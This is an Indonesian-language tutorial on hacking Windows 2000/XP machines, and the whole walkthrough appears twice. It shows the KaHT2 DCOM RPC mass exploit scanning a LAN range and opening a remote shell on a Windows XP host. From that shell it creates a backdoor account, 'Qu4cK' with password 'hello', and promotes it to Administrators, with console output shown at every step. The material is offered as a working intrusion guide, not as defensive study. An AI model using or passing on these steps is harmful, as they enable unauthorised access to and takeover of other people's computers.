Hacking Windows 2000/XP]
Tool yg digunakan :
-> kaht2 (win)
-> AWRC (Remote - Client)
-> Modal Nekat
-> klo bisa ditemani ma pacar ya biar semangat
* Kaht2
Masuk ke command prompt dan jalankan kaht2 seperti :
C:>kaht.exe
_________________________________________________
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4r@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
PUBLIC VERSION Razz
________________________________________________
Usage: KaHt2.exe IP1 IP2 [THREADS] [AH]
example: KaHt2.exe 192.168.0.0 192.168.255.255
NEW!: Macros Available in shell enviroment!!
Type !! for more info into a shell.
C:\> kaht 192.168.1.1 192.168.1.255 --> Tergantung jaringan yang ada
[+] Targets: 192.168.1.2-192.168.1.255 with 50 Threads
[+] Attacking Port: 135. Remote Shell at port: 33478
[+] Scan In Progress...
- Connecting to 192.168.1.10
Sending Exploit to a [Win2k] Server...FAILED
- Connecting to 192.168.1.12
Sending Exploit to a [WinXP] Server...
- Conectando con la Shell Remota...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32> <-- OK kita sudah masuk pada komputer target (192.168.1.12)
C:\WINDOWS\system32>net user <-- melihat account yg ada pada komputer target
------------------------------------------------------------ --------
Administrator Guest Help Assistant
Jarkom Jarkom1 Jarkom2
SUPPORT_388945a0
The command completed successfully.
C:\WINDOWS\system32>net
net
The syntax of this command is:
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]
C:\WINDOWS\system32>net user Qu4cK hello /add <-- memasukan login Qu4cK dan password hello pada komputer target
The command completed successfully.
C:\WINDOWS\system32>net user <-- kita liat apakah login Qu4cK udah ada ------------------------------------------------------------ -----
Administrator Guest Help Assistant
Jarkom Jarkom1 Jarkom2
Qu4cK SUPPORT_388945a0
The command completed successfully.
C:\WINDOWS\system32>net user Qu4cK
User name Qu4cK
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/28/2007 10:45AM
Password expires 8/10/2007 9:33 AM
Password changeable 6/28/2007 10:45AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
OK login Qu4cK udah masuk di Komputer Target, Aduh ternyata kita cuman bisa login hanya sebagai user biasa sekarang kita masukan login Qu4cK sebagai groups Administrator
C:\WINDOWS\system32>net localgroup Administrators Qu4cK /add
The command completed successfully.
kita check sekali lagi apakah masih sebagai user biasa ato sudah berubah menjadi administrator.
C:\WINDOWS\system32>net user Qu4cK
User name Qu4cK
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/28/2007 10:45AM
Password expires 8/10/2007 9:33 AM
Password changeable 6/28/2007 10:45AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.
-> kaht2 (win)
-> AWRC (Remote - Client)
-> Modal Nekat
-> klo bisa ditemani ma pacar ya biar semangat
* Kaht2
Masuk ke command prompt dan jalankan kaht2 seperti :
C:>kaht.exe
_________________________________________________
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4r@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
PUBLIC VERSION Razz
________________________________________________
Usage: KaHt2.exe IP1 IP2 [THREADS] [AH]
example: KaHt2.exe 192.168.0.0 192.168.255.255
NEW!: Macros Available in shell enviroment!!
Type !! for more info into a shell.
C:\> kaht 192.168.1.1 192.168.1.255 --> Tergantung jaringan yang ada
[+] Targets: 192.168.1.2-192.168.1.255 with 50 Threads
[+] Attacking Port: 135. Remote Shell at port: 33478
[+] Scan In Progress...
- Connecting to 192.168.1.10
Sending Exploit to a [Win2k] Server...FAILED
- Connecting to 192.168.1.12
Sending Exploit to a [WinXP] Server...
- Conectando con la Shell Remota...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32> <-- OK kita sudah masuk pada komputer target (192.168.1.12)
C:\WINDOWS\system32>net user <-- melihat account yg ada pada komputer target
------------------------------------------------------------ --------
Administrator Guest Help Assistant
Jarkom Jarkom1 Jarkom2
SUPPORT_388945a0
The command completed successfully.
C:\WINDOWS\system32>net
net
The syntax of this command is:
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]
C:\WINDOWS\system32>net user Qu4cK hello /add <-- memasukan login Qu4cK dan password hello pada komputer target
The command completed successfully.
C:\WINDOWS\system32>net user <-- kita liat apakah login Qu4cK udah ada ------------------------------------------------------------ -----
Administrator Guest Help Assistant
Jarkom Jarkom1 Jarkom2
Qu4cK SUPPORT_388945a0
The command completed successfully.
C:\WINDOWS\system32>net user Qu4cK
User name Qu4cK
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/28/2007 10:45AM
Password expires 8/10/2007 9:33 AM
Password changeable 6/28/2007 10:45AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
OK login Qu4cK udah masuk di Komputer Target, Aduh ternyata kita cuman bisa login hanya sebagai user biasa sekarang kita masukan login Qu4cK sebagai groups Administrator
C:\WINDOWS\system32>net localgroup Administrators Qu4cK /add
The command completed successfully.
kita check sekali lagi apakah masih sebagai user biasa ato sudah berubah menjadi administrator.
C:\WINDOWS\system32>net user Qu4cK
User name Qu4cK
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/28/2007 10:45AM
Password expires 8/10/2007 9:33 AM
Password changeable 6/28/2007 10:45AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.
